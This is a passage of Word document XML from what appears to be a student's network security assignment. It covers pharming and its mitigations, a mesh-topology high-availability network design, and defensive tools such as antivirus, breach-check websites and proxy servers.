          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00EF0FCB" w:rsidRPr="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[14]</w:t>
          </w:r>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="3A834373" w14:textId="77777777" w:rsidR="00D76C1A" w:rsidRPr="006010C3" w:rsidRDefault="00D76C1A" w:rsidP="0062208D"/>
    <w:p w14:paraId="1089B5B3" w14:textId="48FC7A30" w:rsidR="00A168FD" w:rsidRPr="006010C3" w:rsidRDefault="00D713CC" w:rsidP="0062208D">
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve">Another type of phishing attack is Pharming. </w:t>
      </w:r>
      <w:r w:rsidR="00A168FD" w:rsidRPr="006010C3">
        <w:t>A p</w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve">harming </w:t>
      </w:r>
      <w:r w:rsidR="006A3864" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">attack is when a user gets taken to a fake </w:t>
      </w:r>
      <w:r w:rsidR="00A168FD" w:rsidRPr="006010C3">
        <w:t>version of the website they were intending to use. The fake website can be</w:t>
      </w:r>
      <w:r w:rsidR="006A3864" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> used to take personal information from the user visiting</w:t>
      </w:r>
      <w:r w:rsidR="00A5436E" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> such as the username, </w:t>
      </w:r>
      <w:r w:rsidR="00A168FD" w:rsidRPr="006010C3">
        <w:t>password,</w:t>
      </w:r>
      <w:r w:rsidR="00A5436E" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> and bank details.</w:t>
      </w:r>
      <w:r w:rsidR="00A168FD" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> The user’s </w:t>
      </w:r>
      <w:r w:rsidR="00F433E8" w:rsidRPr="006010C3">
        <w:t>login details</w:t>
      </w:r>
      <w:r w:rsidR="00A168FD" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> can be taken as the website can have a fake login in system that saves the users login information. This information can be used to take over the user’s account. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C0FAFC" w14:textId="33F2064A" w:rsidR="00A168FD" w:rsidRPr="006010C3" w:rsidRDefault="002B2007" w:rsidP="0062208D">
      <w:r w:rsidRPr="006010C3">
        <w:t>There are multiple migration</w:t>
      </w:r>
      <w:r w:rsidR="00A168FD" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t>strategies</w:t>
      </w:r>
      <w:r w:rsidR="00A168FD" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> for</w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> pharming including to use a password manager that fills in passwords for </w:t>
      </w:r>
      <w:r w:rsidR="007A1A14" w:rsidRPr="006010C3">
        <w:t>websites you have visited previously</w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t>. This is because if you are on a fake version of the website it will recognise it’s a different website and not let you auto fill the password which will allow you to spot the difference.</w:t>
      </w:r>
      <w:r w:rsidR="007A1A14" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> Another migration strategy is to use a different DNS service as one of the causes of farming is a poisoned DNS so changing the DNS service completely can prevent and even stop current pharming.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1108086086"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION MalNA2 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00EF0FCB" w:rsidRPr="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[15]</w:t>
          </w:r>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="2CB98170" w14:textId="77777777" w:rsidR="007908BD" w:rsidRPr="006010C3" w:rsidRDefault="007908BD" w:rsidP="0062208D"/>
    <w:p w14:paraId="2DE8B877" w14:textId="77777777" w:rsidR="00C269FB" w:rsidRPr="006010C3" w:rsidRDefault="00C269FB" w:rsidP="00EB2C3B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc165489685"/>
      <w:r w:rsidRPr="006010C3">
        <w:lastRenderedPageBreak/>
        <w:t>Part 2:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="252311C5" w14:textId="6BE8F194" w:rsidR="00C269FB" w:rsidRPr="006010C3" w:rsidRDefault="00C269FB" w:rsidP="00EB2C3B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc165489686"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>a) Using a network diagram (topology) or illustrations, create a secure network design</w:t>
      </w:r>
      <w:r w:rsidR="00EB2C3B" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t>incorporating two specified design principles focused on achieving high availability.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="4D6D88BC" w14:textId="77777777" w:rsidR="00C269FB" w:rsidRPr="006010C3" w:rsidRDefault="00C269FB" w:rsidP="005E6113">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc165489687"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>) Eliminate single points of failure.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="7E2369C9" w14:textId="77777777" w:rsidR="00C269FB" w:rsidRPr="006010C3" w:rsidRDefault="00C269FB" w:rsidP="005E6113">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc165489688"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>ii) Provide for reliable crossover.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="0577507E" w14:textId="77777777" w:rsidR="00C75C2B" w:rsidRPr="006010C3" w:rsidRDefault="00C75C2B" w:rsidP="00C269FB"/>
    <w:p w14:paraId="341B3490" w14:textId="6AE97AFD" w:rsidR="00C75C2B" w:rsidRPr="006010C3" w:rsidRDefault="00C75C2B" w:rsidP="00C269FB">
      <w:r w:rsidRPr="006010C3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A2032D3" wp14:editId="4C14C8B4">
            <wp:extent cx="4777740" cy="2104619"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="449851958"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851958" name="Picture 1" descr="A diagram of a computer network&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4783936" cy="2107348"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C122C8A" w14:textId="104CAAE3" w:rsidR="00EB2C3B" w:rsidRPr="006010C3" w:rsidRDefault="00EB2C3B" w:rsidP="00C269FB">
      <w:r w:rsidRPr="006010C3">
        <w:t>Personal design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296ED2D8" w14:textId="5189E1C5" w:rsidR="00EB2C3B" w:rsidRPr="006010C3" w:rsidRDefault="00AE261B" w:rsidP="00C269FB">
      <w:r w:rsidRPr="006010C3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36A20980" wp14:editId="01533990">
            <wp:extent cx="5731510" cy="3541395"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="1867499300"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499300" name="Picture 1" descr="A diagram of a computer network&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3541395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E8A21D" w14:textId="4B250451" w:rsidR="00EB2C3B" w:rsidRPr="006010C3" w:rsidRDefault="00EB2C3B" w:rsidP="00C269FB">
      <w:r w:rsidRPr="006010C3">
        <w:t>Packet Tracer Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A36A768" w14:textId="77777777" w:rsidR="00EB2C3B" w:rsidRPr="006010C3" w:rsidRDefault="00EB2C3B" w:rsidP="00C269FB"/>
    <w:p w14:paraId="09755EDB" w14:textId="40170EEB" w:rsidR="00DB2815" w:rsidRPr="006010C3" w:rsidRDefault="00CC3F45" w:rsidP="00C269FB">
      <w:r w:rsidRPr="006010C3">
        <w:t>The network</w:t>
      </w:r>
      <w:r w:rsidR="00110D7B" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B62E8" w:rsidRPr="006010C3">
        <w:t>design</w:t>
      </w:r>
      <w:r w:rsidR="00110D7B" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB2C3B" w:rsidRPr="006010C3">
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidR="00110D7B" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00110D7B" w:rsidRPr="006010C3">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00EB2C3B" w:rsidRPr="006010C3">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00110D7B" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> created</w:t>
      </w:r>
      <w:r w:rsidR="00310E26" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C726FD" w:rsidRPr="006010C3">
        <w:t>is a</w:t>
      </w:r>
      <w:r w:rsidR="00584384" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> mesh </w:t>
      </w:r>
      <w:r w:rsidR="0078252F" w:rsidRPr="006010C3">
        <w:t>topology</w:t>
      </w:r>
      <w:r w:rsidR="00584384" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> as the design of a mesh topology </w:t>
      </w:r>
      <w:r w:rsidR="00930C42" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidR="00DB2815" w:rsidRPr="006010C3">
        <w:t>limit the risk of</w:t>
      </w:r>
      <w:r w:rsidR="00B508DA" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> a single point of </w:t>
      </w:r>
      <w:r w:rsidR="0078252F" w:rsidRPr="006010C3">
        <w:t>failure</w:t>
      </w:r>
      <w:r w:rsidR="00B508DA" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> and has reliable crossover. </w:t>
      </w:r>
      <w:r w:rsidR="004B6D51" w:rsidRPr="006010C3">
        <w:t>Using a mesh topology allows for the data to be transported</w:t>
      </w:r>
      <w:r w:rsidR="00E72D86" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> efficiently as it can go through </w:t>
      </w:r>
      <w:r w:rsidR="0097421F" w:rsidRPr="006010C3">
        <w:t>the quickest path.</w:t>
      </w:r>
      <w:r w:rsidR="00C5139E" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2113848403"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION LenNA \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00EF0FCB" w:rsidRPr="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[16]</w:t>
          </w:r>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B508DA" w:rsidRPr="006010C3">
        <w:t>The reason why this design</w:t>
      </w:r>
      <w:r w:rsidR="0097421F" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB2815" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">can limit the risk </w:t>
      </w:r>
      <w:r w:rsidR="0097421F" w:rsidRPr="006010C3">
        <w:t>a single point of failure</w:t>
      </w:r>
      <w:r w:rsidR="00C75C2B" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> and has reliable crossover</w:t>
      </w:r>
      <w:r w:rsidR="0023425E" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> is if one device fails </w:t>
      </w:r>
      <w:r w:rsidR="009513C2" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">there are other </w:t>
      </w:r>
      <w:r w:rsidR="00AA5BB7" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">routes for the data to take to get to </w:t>
      </w:r>
      <w:r w:rsidR="00531D04" w:rsidRPr="006010C3">
        <w:t>its</w:t>
      </w:r>
      <w:r w:rsidR="00325DBE" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> destination.</w:t>
      </w:r>
      <w:r w:rsidR="00707A72" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> Additionally having </w:t>
      </w:r>
      <w:r w:rsidR="00C75C2B" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">the ability of the data to take multiple routes makes the network more </w:t>
      </w:r>
      <w:r w:rsidR="00707A72" w:rsidRPr="006010C3">
        <w:t>reliable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA372F4" w14:textId="7D33AF01" w:rsidR="00EB2C3B" w:rsidRPr="006010C3" w:rsidRDefault="00EB2C3B" w:rsidP="00C269FB">
      <w:r w:rsidRPr="006010C3">
        <w:t>Furthermore, an additional benefit of using a mesh topology is new devices can be added with ease which makes this topology more convenient.</w:t>
      </w:r>
      <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1983371665"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve">CITATION Ann08 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00EF0FCB" w:rsidRPr="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[17]</w:t>
          </w:r>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="69CDE5C6" w14:textId="77777777" w:rsidR="00DB2815" w:rsidRPr="006010C3" w:rsidRDefault="00DB2815" w:rsidP="00C269FB"/>
    <w:p w14:paraId="2296C461" w14:textId="77777777" w:rsidR="00C726FD" w:rsidRPr="006010C3" w:rsidRDefault="00C726FD" w:rsidP="00C269FB"/>
    <w:p w14:paraId="011AFE15" w14:textId="2A6A806C" w:rsidR="3358189A" w:rsidRPr="006010C3" w:rsidRDefault="3358189A" w:rsidP="3358189A"/>
    <w:p w14:paraId="63EC30E0" w14:textId="5A87530E" w:rsidR="002C2C4A" w:rsidRPr="006010C3" w:rsidRDefault="002C2C4A" w:rsidP="002C2C4A"/>
    <w:p w14:paraId="50E7B3DE" w14:textId="77777777" w:rsidR="002C2C4A" w:rsidRPr="006010C3" w:rsidRDefault="002C2C4A" w:rsidP="3358189A"/>
    <w:p w14:paraId="0040B0B6" w14:textId="318580A3" w:rsidR="00C269FB" w:rsidRPr="006010C3" w:rsidRDefault="00C269FB" w:rsidP="004D5D05">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc165489689"/>
      <w:r w:rsidRPr="006010C3">
        <w:lastRenderedPageBreak/>
        <w:t>b) Which software and hardware technologies can be implemented to enhance network security during</w:t>
      </w:r>
      <w:r w:rsidR="006B6745" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t>ts operation? Provide detailed explanations on the functionality of the proposed technologies, making</w:t>
      </w:r>
      <w:r w:rsidR="006B6745" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t>reasonable assumptions.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="27D1C475" w14:textId="77777777" w:rsidR="002B0E80" w:rsidRPr="006010C3" w:rsidRDefault="002B0E80" w:rsidP="002B0E80"/>
    <w:p w14:paraId="51AF9476" w14:textId="5F01717C" w:rsidR="002B0E80" w:rsidRPr="006010C3" w:rsidRDefault="002B0E80" w:rsidP="002B0E80">
      <w:r w:rsidRPr="006010C3">
        <w:t>Software can be used to help enhance the security of a network. One example of this is</w:t>
      </w:r>
      <w:r w:rsidR="00FC5A5D" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0083693A" w:rsidRPr="006010C3">
        <w:t>anti-virus</w:t>
      </w:r>
      <w:r w:rsidR="00FC5A5D" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> software such as Malwarebytes, Norton and Avast. </w:t>
      </w:r>
      <w:r w:rsidR="005D6F12" w:rsidRPr="006010C3">
        <w:t>Anti-virus</w:t>
      </w:r>
      <w:r w:rsidR="00FC5A5D" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> software is extremely important to enhance network security</w:t>
      </w:r>
      <w:r w:rsidR="00514045" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> as it limits the chances of Malware such as ransomware and Trojans infecting computer systems. If Malware </w:t>
      </w:r>
      <w:r w:rsidR="005E6113">
        <w:t>was able to</w:t>
      </w:r>
      <w:r w:rsidR="00514045" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> infect computer </w:t>
      </w:r>
      <w:r w:rsidR="005D6F12" w:rsidRPr="006010C3">
        <w:t>systems,</w:t>
      </w:r>
      <w:r w:rsidR="00514045" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> it could lead to data loss</w:t>
      </w:r>
      <w:r w:rsidR="005D6F12" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00514045" w:rsidRPr="006010C3">
        <w:t>the whole network getting tak</w:t>
      </w:r>
      <w:r w:rsidR="0039230A">
        <w:t>en</w:t>
      </w:r>
      <w:r w:rsidR="00514045" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> over.</w:t>
      </w:r>
      <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="506786685"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve">CITATION Placeholder1 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00EF0FCB" w:rsidRPr="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[18]</w:t>
          </w:r>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="102729F8" w14:textId="77777777" w:rsidR="006D6D6C" w:rsidRPr="006010C3" w:rsidRDefault="006D6D6C" w:rsidP="002B0E80"/>
    <w:p w14:paraId="6500FDA6" w14:textId="54905ACA" w:rsidR="006D6D6C" w:rsidRPr="006010C3" w:rsidRDefault="006D6D6C" w:rsidP="002B0E80">
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve">Another software that can be used to help enhance network </w:t>
      </w:r>
      <w:r w:rsidR="005D6F12" w:rsidRPr="006010C3">
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> is the use of the website “haveibeenpwned”. </w:t>
      </w:r>
      <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
        <w:t>These websites</w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> allow someone to input their email address and see </w:t>
      </w:r>
      <w:r w:rsidR="005D6F12" w:rsidRPr="006010C3">
        <w:t>if any websites you have signed up with have had a data breach.</w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> This </w:t>
      </w:r>
      <w:r w:rsidR="005D6F12" w:rsidRPr="006010C3">
        <w:t>helps</w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> your network as </w:t>
      </w:r>
      <w:r w:rsidR="005D6F12" w:rsidRPr="006010C3">
        <w:t>the data that has been exposed in the breach can be used to attack your network such as personal information being used for targeted attacks.</w:t>
      </w:r>
      <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="605924657"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION TroNA \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00EF0FCB" w:rsidRPr="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[19]</w:t>
          </w:r>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="4F1B15D8" w14:textId="77777777" w:rsidR="006D6D6C" w:rsidRPr="006010C3" w:rsidRDefault="006D6D6C" w:rsidP="002B0E80"/>
    <w:p w14:paraId="79048190" w14:textId="1D69FBBF" w:rsidR="006D6D6C" w:rsidRPr="006010C3" w:rsidRDefault="006D6D6C" w:rsidP="002B0E80"/>
    <w:p w14:paraId="02E1954B" w14:textId="2FB36F95" w:rsidR="005D6F12" w:rsidRPr="006010C3" w:rsidRDefault="00514045" w:rsidP="002B0E80">
      <w:r w:rsidRPr="006010C3">
        <w:t>Hardware also can be used to help enhance the security of a network.</w:t>
      </w:r>
      <w:r w:rsidR="00767FEA" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> One example of this is a hardware proxy server. A hardware proxy server acts as a go between the internet and the end </w:t>
      </w:r>
      <w:r w:rsidR="005D6F12" w:rsidRPr="006010C3">
        <w:t>user. This</w:t>
      </w:r>
      <w:r w:rsidR="00767FEA" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> is useful as it can block out </w:t>
      </w:r>
      <w:r w:rsidR="0083693A" w:rsidRPr="006010C3">
        <w:t>cyber-attacks</w:t>
      </w:r>
      <w:r w:rsidR="00767FEA" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="006D6D6C" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">malware </w:t>
      </w:r>
      <w:r w:rsidR="0043430A" w:rsidRPr="006010C3">
        <w:t>because of its ability to</w:t>
      </w:r>
      <w:r w:rsidR="006D6D6C" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> block out anything malicious and to keep it from getting to the end user.</w:t>
      </w:r>
      <w:r w:rsidR="005D6F12" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1645005231"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Mic22 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00EF0FCB" w:rsidRPr="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[20]</w:t>
          </w:r>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-944764892"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="000D6B6C" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="000D6B6C" w:rsidRPr="006010C3">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION ForNA \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="000D6B6C" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
